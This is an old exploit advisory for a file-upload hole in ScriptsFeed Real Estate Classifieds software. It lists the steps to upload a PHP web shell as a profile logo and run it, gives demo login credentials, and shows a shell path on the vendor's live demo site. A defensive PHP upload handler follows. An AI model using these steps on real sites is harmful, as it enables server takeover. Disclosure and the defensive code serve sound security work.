ScriptsFeed SF Real Estate Classifieds Software File Upload Vuln

[~]   ScriptsFeed (SF) Real Estate Classifieds Software Remote File Upload
[~]
[~]   ----------------------------------------------------------
[~]   Discovered By: ZoRLu
[~]
[~]   Date: 13.11.2008
[~]
[~]   Home: www.z0rlu.blogspot.com
[~]
[~]   contact: trt-turk@hotmail.com
[~]
[~]   NOTE: LONELINESS LOST ITS MEANING IN MY LONELINESS : ( (
[~]
[~]   my bug number now: 39
[~]
[~]   my target bug number: 100
[~]
[~]   -----------------------------------------------------------


Exploit:

http://localhost/script/re_images/[id]_logo_your_shell.php

First, register on the site.

register: http://localhost/script/register.php

Then log in to the site.

login: http://localhost/script/login.php

Next, go to profile edit.

profile: http://localhost/script/profile.php

Upload your_shell.php there, then right-click your logo, select Properties and copy the link.

Paste the link into your browser to go to your_shell.php.

your_shell.php path:

http://localhost/script/re_images/[id]_logo_your_shell.php



rfu for demo:

user: zorlu

passwd: zorlu1


ZoRLu                                                                                           11/13/2008
shell path:

http://www.scriptsfeed.com/demos/realtor_web_6/re_images/1226595925_logo_c.php


[~]----------------------------------------------------------------------
[~] Greetz tO: str0ke & all Muslim HaCkeRs
[~]
[~] yildirimordulari.org & darkc0de.com
[~]
[~]----------------------------------------------------------------------

# milw0rm.com [2008-11-13]
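
The paths above show the uploaded file landing in the web-served `re_images/` directory as `[id]_logo_` plus the client's own filename, extension included. As an added defensive example (not ScriptsFeed's code and not part of the advisory), this PHP handler picks the extension from the file's content and discards the client name; the field name `logo`, the size cap and the function names are assumptions.

```php
<?php
// Added example, not ScriptsFeed code. The field name "logo", the size cap and
// the function names are assumptions made for illustration.

const LOGO_TYPES = [              // MIME type detected from content => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const LOGO_MAX_BYTES = 1048576;   // 1 MiB cap (assumed policy)

/** Return the server-chosen extension for a candidate logo file, or null to reject it. */
function logo_extension(string $path): ?string
{
    $size = filesize($path);
    if ($size === false || $size === 0 || $size > LOGO_MAX_BYTES) {
        return null;
    }
    // Decide the type from the bytes, never from the client filename or Content-Type.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($path);
    if ($mime === false || !array_key_exists($mime, LOGO_TYPES)) {
        return null;
    }
    // The file must also parse as an image; getimagesize() returns false otherwise.
    if (@getimagesize($path) === false) {
        return null;
    }
    return LOGO_TYPES[$mime];
}

/** Store the upload under a random name; returns that name, or null if rejected. */
function store_logo(array $upload, string $destDir): ?string
{
    if (($upload['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($upload['tmp_name'] ?? '')) {
        return null;
    }
    $ext = logo_extension($upload['tmp_name']);
    if ($ext === null) {
        return null;
    }
    // The client-supplied name (e.g. "your_shell.php") is never used on disk.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($upload['tmp_name'], $destDir . '/' . $name)) {
        return null;
    }
    return $name;
}
// In the profile handler: $stored = store_logo($_FILES['logo'], __DIR__ . '/re_images');
```

Because a file that is a valid image can still carry embedded script text, the web server should also be configured so that nothing under `re_images/` is executed as PHP.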



